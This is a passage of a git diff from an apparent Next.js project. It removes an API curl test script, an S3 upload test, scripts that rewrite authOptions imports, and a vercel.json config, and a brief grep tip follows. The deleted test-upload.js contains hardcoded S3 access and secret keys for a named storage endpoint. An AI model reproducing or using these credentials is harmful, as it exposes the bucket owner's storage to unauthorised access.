2: ID RocketChat null ===" -curl -X POST "${API_URL}/missions/mission-created" \ - -H "Content-Type: application/json" \ - -H "x-api-key: ${API_KEY}" \ - -d "{ - \"missionId\": \"${MISSION_ID}\", - \"rocketchatChannelId\": null - }" \ - -s | jq '.' - -echo "" -echo "=== Test 3: ID RocketChat chaîne vide ===" -curl -X POST "${API_URL}/missions/mission-created" \ - -H "Content-Type: application/json" \ - -H "x-api-key: ${API_KEY}" \ - -d "{ - \"missionId\": \"${MISSION_ID}\", - \"rocketchatChannelId\": \"\" - }" \ - -s | jq '.' - -echo "" -echo "=== Test 4: ID RocketChat non fourni ===" -curl -X POST "${API_URL}/missions/mission-created" \ - -H "Content-Type: application/json" \ - -H "x-api-key: ${API_KEY}" \ - -d "{ - \"missionId\": \"${MISSION_ID}\" - }" \ - -s | jq '.' 
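-
-# NB: these tests pipe through jq, so jq must be installed; with the default
-# "your-api-key-here" placeholder the API will most likely answer 401 until a
-# real N8N_API_KEY is exported.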
diff --git a/test-upload.js b/test-upload.js
deleted file mode 100644
index bc95415..0000000
--- a/test-upload.js
+++ /dev/null
@@ -1,36 +0,0 @@
-const { S3Client, PutObjectCommand } = require('@aws-sdk/client-s3');
-const fs = require('fs');
-
-const s3Config = {
-  endpoint: 'https://dome-api.slm-lab.net',
-  region: 'us-east-1',
-  credentials: {
-    accessKeyId: 'LwgeE1ntADD20OuWC88S3pR0EaO7FtO4',
-    secretAccessKey: 'gbdrqJsXyU4IFxsfz9xdrnQeMRy2eZHeqQRrAeBR'
-  },
-  forcePathStyle: true
-};
-
-const s3Client = new S3Client(s3Config);
-
-async function uploadFile() {
-  try {
-    const fileContent = fs.readFileSync('/Users/alma/Documents/test.png');
-
-    const command = new PutObjectCommand({
-      Bucket: 'missions',
-      Key: 'test-mission/logo.png',
-      Body: fileContent,
-      ContentType: 'image/png',
-      ACL: 'public-read'
-    });
-
-    console.log('Uploading file...');
-    const response = await s3Client.send(command);
-    console.log('Upload successful!', response);
-  } catch (error) {
-    console.error('Error uploading file:', error);
-  }
-}
-
-uploadFile();
\ No newline at end of file
diff --git a/update-imports.js b/update-imports.js
deleted file mode 100644
index d2f5464..0000000
--- a/update-imports.js
+++ /dev/null
@@ -1,102 +0,0 @@
-const fs = require('fs');
-const path = require('path');
-
-// Function to recursively find all TypeScript files
-function findTsFiles(dir, fileList = []) {
-  const files = fs.readdirSync(dir);
-
-  files.forEach(file => {
-    const filePath = path.join(dir, file);
-    const stat = fs.statSync(filePath);
-
-    if (stat.isDirectory() && !filePath.includes('node_modules') && !filePath.includes('.next')) {
-      fileList = findTsFiles(filePath, fileList);
-    } else if (
-      stat.isFile() &&
-      (filePath.endsWith('.ts') || filePath.endsWith('.tsx')) &&
-      !filePath.includes('node_modules') &&
-      !filePath.includes('.next')
-    ) {
-      fileList.push(filePath);
-    }
-  });
-
-  return fileList;
-}
-
-// Function to update import statements in a file
-function updateImportInFile(filePath) {
-  try {
-    let content = fs.readFileSync(filePath, 'utf8');
-    let updated = false;
-
-    // Update absolute imports
-    if (content.includes('import { authOptions } from "@/app/api/auth/[...nextauth]/route"')) {
-      content = content.replace(
-        'import { authOptions } from "@/app/api/auth/[...nextauth]/route"',
-        'import { authOptions } from "@/app/api/auth/options"'
-      );
-      updated = true;
-    }
-
-    // Update relative imports
-    if (content.includes('import { authOptions } from "../../auth/[...nextauth]/route"')) {
-      content = content.replace(
-        'import { authOptions } from "../../auth/[...nextauth]/route"',
-        'import { authOptions } from "../../auth/options"'
-      );
-      updated = true;
-    }
-
-    // Other possible relative paths (brackets and dots escaped so the
-    // pattern matches a literal [...nextauth]-style segment)
-    const patterns = [
-      /import\s*{\s*authOptions\s*}\s*from\s*['"](.*)\/auth\/\[\.\.\.\S+\]\/route['"]/g,
-      /import\s*{\s*authOptions\s*}\s*from\s*['"](.*)\[\.\.\.\S+\]\/route['"]/g
-    ];
-
-    for (const pattern of patterns) {
-      const matches = content.matchAll(pattern);
-      for (const match of matches) {
-        const fullMatch = match[0];
-        const basePath = match[1];
-        const replacement = `import { authOptions } from "${basePath}/auth/options"`;
-        content = content.replace(fullMatch, replacement);
-        updated = true;
-      }
-    }
-
-    if (updated) {
-      fs.writeFileSync(filePath, content, 'utf8');
-      console.log(`Updated: ${filePath}`);
-      return true;
-    }
-
-    return false;
-  } catch (error) {
-    console.error(`Error updating ${filePath}:`, error);
-    return false;
-  }
-}
-
-// Main function
-function main() {
-  const rootDir = './app';
-  const libDir = './lib';
-
-  const tsFiles = [
-    ...findTsFiles(rootDir),
-    ...findTsFiles(libDir)
-  ];
-
-  let updatedCount = 0;
-
-  tsFiles.forEach(file => {
-    if (updateImportInFile(file)) {
-      updatedCount++;
-    }
-  });
-
-  console.log(`\nCompleted! Updated ${updatedCount} files.`);
-}
-
-main();
\ No newline at end of file
diff --git a/update-imports.sh b/update-imports.sh
deleted file mode 100755
index 74db781..0000000
--- a/update-imports.sh
+++ /dev/null
@@ -1,7 +0,0 @@
-#!/bin/bash
-
-# Rewrite authOptions imports in all TypeScript files under ./app
-find ./app -type f -name "*.ts*" -print0 | xargs -0 sed -i '' 's|import { authOptions } from "@/app/api/auth/\[...nextauth\]/route";|import { authOptions } from "@/app/api/auth/options";|g'
-find ./app -type f -name "*.ts*" -print0 | xargs -0 sed -i '' 's|import { authOptions } from "../../auth/\[...nextauth\]/route";|import { authOptions } from "../../auth/options";|g'
-
-echo "Updated authOptions imports in all files."
\ No newline at end of file
diff --git a/vercel.json b/vercel.json
deleted file mode 100644
index cbf2dd6..0000000
--- a/vercel.json
+++ /dev/null
@@ -1,47 +0,0 @@
-{
-  "buildCommand": "npm run build",
-  "devCommand": "npm run dev",
-  "installCommand": "npm ci",
-  "framework": "nextjs",
-  "regions": ["cdg1"],
-  "env": {
-    "NEXT_TELEMETRY_DISABLED": "1"
-  },
-  "functions": {
-    "app/**/*.ts": {
-      "maxDuration": 30
-    },
-    "app/**/*.tsx": {
-      "maxDuration": 30
-    }
-  },
-  "headers": [
-    {
-      "source": "/(.*)",
-      "headers": [
-        {
-          "key": "X-Content-Type-Options",
-          "value": "nosniff"
-        },
-        {
-          "key": "X-Frame-Options",
-          "value": "SAMEORIGIN"
-        },
-        {
-          "key": "X-XSS-Protection",
-          "value": "1; mode=block"
-        },
-        {
-          "key": "Referrer-Policy",
-          "value": "strict-origin-when-cross-origin"
-        }
-      ]
-    }
-  ],
-  "rewrites": [
-    {
-      "source": "/api/:path*",
-      "destination": "/api/:path*"
-    }
-  ]
-}
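Both import updaters above (update-imports.js and update-imports.sh) rewrite files in place without reporting any leftovers. A quick follow-up check, sketched here as a plain grep — the pattern and directories are assumptions based on the scripts above, so adjust them to the actual tree:

```bash
# List any file that still imports authOptions from a [...nextauth]/route module.
# No output means the migration to "@/app/api/auth/options" is complete.
grep -rn --include='*.ts' --include='*.tsx' 'nextauth]/route' ./app ./lib
```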